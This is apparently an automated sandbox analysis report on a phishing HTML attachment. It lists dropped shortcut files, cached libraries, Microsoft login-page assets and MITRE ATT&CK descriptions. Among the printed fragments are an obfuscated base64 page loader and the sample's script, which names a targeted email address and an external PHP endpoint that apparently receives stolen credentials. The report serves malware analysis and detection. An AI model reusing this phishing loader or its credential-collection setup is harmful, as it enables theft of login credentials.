Preview:	L..................F.@.. ...$+.,......U+....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXW8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXWD............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........).E......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 24 20:58:06 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988420591793215
Encrypted:	false
SSDEEP:
MD5:	4C207B55908AEF75C13AB042599D3BD8
SHA1:	B50C63EE32792A4BB0C4F710B2E1476569B820D6
SHA-256:	6C37B96EA25102698724D10AB028AD0A0F210C530898B1AAED28F4EC0EC72D6F
SHA-512:	D567A05AB4342193D3CEF249B7921145C47E75EB881576B2CDCF7DFA896131076F1264D3BD1D6E5F92360EA2F107D4226C9F0BFCE7346B1477196A4574C31268
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....!.k+....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXW8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXWD............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........).E......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 24 20:58:06 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.99877662228148
Encrypted:	false
SSDEEP:
MD5:	A528EEB6427CEE3F1E1DA582F686F851
SHA1:	31E83ECF3F82A28C56F0620879C2E11D62DF0CCA
SHA-256:	11F182FBF27D45C4AF5FA1928E407A4E15B823A81033B90CDF1AB02B901BE5B6
SHA-512:	9143127594FCB18699F6DFBF3D34ECBFD2A25D4269A84FADE3FAB896E9A86652B28BE6213281E7947C56A65486A5702B7B0D89C5C96349C8E248AB5150DE456F
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....\|.J+....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXW8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXWD............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........).E......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4143)
Category:	downloaded
Size (bytes):	73015
Entropy (8bit):	5.342744191670081
Encrypted:	false
SSDEEP:
MD5:	9BECC40FB1D85D21D0CA38E2F7069511
SHA1:	AE854B04025DB8B7F48FDD6DEDF41E77EAE44394
SHA-256:	A9705DFC47C0763380D851AB1801BE6F76019F6B67E40E9B873F8B4A0603F7A9
SHA-512:	585374E3CE3AB1D28C20FE4B28DA6131A5B353B629332094DB8E5EB4ADE0FF601161B3CAF546F5F1E1BE96353DEAA29109687EAAE098EF279F4A6964430D4035
Malicious:	false
Reputation:	low
URL:	https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js
Preview:	/*. @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */.(function(){function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.apply(t,r)}function t(n,t,r,e){for(var u=-1,i=null==n?0:n.length;++u<i;){var o=n[u];t(e,o,r(o),n)}return e}function r(n,t){for(var r=-1,e=null==n?0:n.length;++r<e&&t(n[r],r,n)!==!1;);return n}function e(n,t){for(var r=null==n?0:n.length;r--&&t(n[r],r,n)!==!1;);return n}function u(n,t){for(var r=-1,e=null==n?0:n.length;++r<e;)if(!t(n[r],r,n))return!1;.return!0}function i(n,t){for(var r=-1,e=null==n?0:n.length,u=0,i=[];++r<e;){var o=n[r];t(o,r,n)&&(i[u++]=o)}return i}function o(n

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65449)
Category:	downloaded
Size (bytes):	93670
Entropy (8bit):	5.24630291837808
Encrypted:	false
SSDEEP:
MD5:	FB192338844EFE86EC759A40152FCB8E
SHA1:	E55DF1F7D6C288EE73D439BAB26DD006FFEE7AF3
SHA-256:	29296CCACAA9ED35ED168FC51E36F54FD6F8DB9C7786BBF38CC59A27229BA5C2
SHA-512:	04A6D247E71FCB12DD300B04D2768B45E1522E0F3FA636E07F11E1FE4FE4502F361F2EEBE87B51E612E1A1B6A59F681C4EFCE4CB27A1ADD444763A6C430CB627
Malicious:	false
Reputation:	low
URL:	https://cdn.jsdelivr.net/npm/vue@2.6.12
Preview:	/!. Vue.js v2.6.12. * (c) 2014-2020 Evan You. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e\|\|self).Vue=t()}(this,function(){"use strict";var e=Object.freeze({});function t(e){return null==e}function n(e){return null!=e}function r(e){return!0===e}function i(e){return"string"==typeof e\|\|"number"==typeof e\|\|"symbol"==typeof e\|\|"boolean"==typeof e}function o(e){return null!==e&&"object"==typeof e}var a=Object.prototype.toString;function s(e){return"[object Object]"===a.call(e)}function c(e){var t=parseFloat(String(e));return t>=0&&Math.floor(t)===t&&isFinite(e)}function u(e){return n(e)&&"function"==typeof e.then&&"function"==typeof e.catch}function l(e){return null==e?"":Array.isArray(e)\|\|s(e)&&e.toString===a?JSON.stringify(e,null,2):String(e)}function f(e){var t=parseFloat(e);return isNaN(t)?e:t}function p(e,t){for(var n=Object.create(null),r=e.split(",")

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (14271)
Category:	downloaded
Size (bytes):	14355
Entropy (8bit):	5.154095774619922
Encrypted:	false
SSDEEP:
MD5:	70489D9432EF978DB53BEBDA3E9F4C14
SHA1:	F24D0BCC36027BCE45C86ACFBA57B248EDB6A3F9
SHA-256:	24B9A49D375465E659DBAECB3FDA81FBF0D3EEDBF138E29CB5229E502D8A4FA1
SHA-512:	6D94B8ED2EEC3CEC648D4FF806DD33AE112D5B1D32D02464844A7C21C9332BE96D89F20813D10C20C4EE4FF984CE820C7B050836BB8304847F8C99DB82EA27A9
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/axios/0.21.1/axios.min.js
Preview:	/* axios v0.21.1 \| (c) 2020 by Matt Zabriskie */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new i(e),n=s(i.prototype.request,t);return o.extend(n,i.prototype,t),o.extend(n,t),n}var o=n(2),s=n(3),i=n(4),a=n(22),u=n(10),c=r(u);c.Axios=i,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),c.isAxiosError=n(26),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefi

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	95996
Entropy (8bit):	5.658819216491236
Encrypted:	false
SSDEEP:
MD5:	11BF2367C4F28FA8F705E6D8EA3D7310
SHA1:	26B77365B7AF5EA39ED041EBE853077D4F8D9D5F
SHA-256:	300D15BC878701AFDEA456765842F0C8125612A162F361E09FA15F05FB74D125
SHA-512:	735F19A8183540E0E7B7CB506F324C55FA7BDF47AB8F8BFAB6234B23870128489A609EE7D56179D178D194FD2BF8048F715F28A2966A6DE8C49A54AB1F932E92
Malicious:	false
Reputation:	low
URL:	https://offline-web.vercel.app/
Preview:	function _0x15e9(_0x58b9d9,_0xcaa877){var _0x4f64b0=_0x4f64();return _0x15e9=function(_0x15e91b,_0x46508a){_0x15e91b=_0x15e91b-0x18f;var _0x540031=_0x4f64b0[_0x15e91b];return _0x540031;},_0x15e9(_0x58b9d9,_0xcaa877);}var _0x35e70a=_0x15e9;(function(_0xfacf0e,_0x9d3467){var _0x59d069=_0x15e9,_0x59d8ee=_0xfacf0e();while(!![]){try{var _0x24d052=-parseInt(_0x59d069(0x19a))/0x1(-parseInt(_0x59d069(0x18f))/0x2)+-parseInt(_0x59d069(0x194))/0x3+parseInt(_0x59d069(0x193))/0x4+parseInt(_0x59d069(0x196))/0x5(parseInt(_0x59d069(0x192))/0x6)+parseInt(_0x59d069(0x191))/0x7+-parseInt(_0x59d069(0x190))/0x8+parseInt(_0x59d069(0x195))/0x9*(-parseInt(_0x59d069(0x197))/0xa);if(_0x24d052===_0x9d3467)break;else _0x59d8ee['push'](_0x59d8ee['shift']());}catch(_0x2f0956){_0x59d8ee['push'](_0x59d8ee['shift']());}}}(_0x4f64,0x867fa),document[_0x35e70a(0x198)](atob(unescape(_0x35e70a(0x199)))));function _0x4f64(){var _0x5c0074=['10HyxHRN','write','CjwhRE9DVFlQRSBodG1sPgo8aHRtbCBkaXI9Imx0ciIgbGFuZz0iRU4tVVMiPgoK

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	downloaded
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 108546
Category:	downloaded
Size (bytes):	19747
Entropy (8bit):	7.979506895526348
Encrypted:	false
SSDEEP:
MD5:	188E30FB13C8B65731FAA2F83B3ACF03
SHA1:	9E39F20B6748307CA4D9AD258A2971BA7C803431
SHA-256:	CCD7769091243219557BC2B5330ECAADA1344C91A6A640B5AAC89BA0B951CB0D
SHA-512:	06A5090D656C7B6283B72CAE88D0BE1BF25AAA5C2228C93E61BCE9674F2B7346BAA31103E13EC9068821088B8EF9BC4DD6355C25FA27E3DB23385067A342931E
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/16.000/Converged_v21033_egJPTAx_byK-yF_CMCKFeg2.css
Preview:	...........}ks.7..w..Y.Rke.Yr..Y.Z..&:...}T.5"....9.3C.Z....7.@....f..MDtO..n4.@7..o~..(wwU~.n../.....r..jWVi...8z^..C.....&[..7.\|..o~..............K.....E...Do.~.\|.2jM....Vy.E.Wi.-.r..U.o...Y.m..<-.UUn.f.E....lA:Q.uC>...6zJ.U..]Z5w...8.HpK..\|K.^(.m.&_dQ.]2j.....h.]fUt...k..[d9.ST.I.YE'J.,..&Z.U.....SP.Y5.......KBp.:J..a.!M..I..7..A#.1.^..QSFw.^.^.'.^G.o...C.59..~..F7.:.&..).z%...=.>..B].E.U..,......U.m.m.!...WwQ.....u..n...+.l.....'O.......F5.Wu..,....].N.:z:..q....zB............'` .....D.o...]n.O..#R..0..=aFv...!J...]E.uZ]g..t{...c.I.-.m.....dB.B...E.t.\.)..\.l. .X#...p.A\|qv.Yfi.$.2M....{].v4U...$.../i.$..7...~....!..I.h;;.\.+..uk..".w..9%}.oHaM..3;...$.RgE.P..X.....\R....jZr...B.$.....T..o.%a...Z.ZB.WeAF0....s.z.%.^.7.....T..^.t....z...Z$.S.....Z7b.X}v7.0.......\|..../.....o.z........N...?...cD0.?.C.1.....#...7.u...........O._.{u...].y......\|.}K.#.;zuI.....6...R./?Pb._.........W....y..o(..}.=g3..._=.........^..#d.\...

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/16.000.29039.9/images/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (378)
Entropy (8bit):	5.50263477330814
TrID:
File name:	Gpchev PaidRemit.Htm
File size:	432 bytes
MD5:	18f5900dfb9fe5ee8b583a4e4f066e87
SHA1:	593a9883831faefab932765fb2d0c2b39fd82c1d
SHA256:	cdd0aede589a2916bda2ccb882f9717774870cf610aec3ce68d3e7f657c4c2b8
SHA512:	b131e8d1a210f0734c8250403f9d54cd975e1bcf570ed08b4df6bb00578bf8c54e11f1cd1983073190553def550f3f58ebfc654d52dfb896d757cf6dba9280ab
SSDEEP:	12:/4iX70deaxSz73YLTN2s/x6MvueZ/zG77/JORWahci:T0deaiqUK6MH/SJOR72i
TLSH:	20E0E5BFBD11A08C3F216AF8CDB2E21C1889C972F851D68114C8582845956FD9ECAAC0
File Content Preview:	##<script 47;jav񡄒t"> .document.write(unescape('<!DOCTYPE html><html><head><nc><script> var Auths = "https://mchub.co.za/ma/Ind.php"; const emails = "cherylp@gpchev.ca"; const key = "27e2b9cb39107e8c0784dd5ea26383vb2u88{}+]+jcda";</script><

File Icon


Icon Hash:	173149cccc490307

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Gpchev PaidRemit.Htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 82

Static File Info

General

File Icon

Windows Analysis Report
Gpchev PaidRemit.Htm